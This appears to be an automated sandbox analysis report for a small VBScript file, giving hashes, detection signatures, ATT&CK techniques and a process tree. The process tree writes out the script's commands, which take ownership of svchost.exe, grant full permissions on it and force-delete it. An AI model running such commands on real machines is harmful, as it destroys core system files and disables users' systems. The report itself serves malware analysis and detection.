15a06ed5f3fc9efb44cea8c22819b3350ca0a3bf6d81476c5eab5276fa6f1fa9

Analysis

max time kernel
118s
max time network
119s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
05-07-2024 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

code.vbs
Size

271B
MD5

e0f806947d5250e613d90a08aabf53dd
SHA1

8aed8a7c0e7cee223a2c1aa926154ade74c23316
SHA256

15a06ed5f3fc9efb44cea8c22819b3350ca0a3bf6d81476c5eab5276fa6f1fa9
SHA512

71af5e2c1afe5085a69a546ff7893df6c284cc85559220d61da7cb2ea7380138081e327ffe3dfc0f56ff9366e5ec0c96ec5b06e8ef3ff9c92b6135159457f44a

Score

8^/10

discovery exploit

Malware Config

Signatures

Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

2656 takeown.exe
2672 icacls.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

2656 takeown.exe
2672 icacls.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2656	takeown.exe
2672	icacls.exe

pid	process
2656	takeown.exe
2672	icacls.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

WScript.execmd.execmd.exe

description	pid	process	target process
PID 3012 wrote to memory of 1268	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 1268	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 1268	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 2780	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 2780	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 2780	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 3032	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 3032	3012	WScript.exe	cmd.exe
PID 3012 wrote to memory of 3032	3012	WScript.exe	cmd.exe
PID 1268 wrote to memory of 2656	1268	cmd.exe	takeown.exe
PID 1268 wrote to memory of 2656	1268	cmd.exe	takeown.exe
PID 1268 wrote to memory of 2656	1268	cmd.exe	takeown.exe
PID 2780 wrote to memory of 2672	2780	cmd.exe	icacls.exe
PID 2780 wrote to memory of 2672	2780	cmd.exe	icacls.exe
PID 2780 wrote to memory of 2672	2780	cmd.exe	icacls.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\code.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:3012

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c takeown C:\Windows\System32\svchost.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:1268

C:\Windows\system32\takeown.exe
takeown C:\Windows\System32\svchost.exe
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2656

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c icacls C:\Windows\System32\svchost.exe /grant Admin:(F)
2⤵
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\svchost.exe /grant Admin:(F)
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c del /f /s /q C:\Windows\System32\svchost.exe
2⤵
PID:3032

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads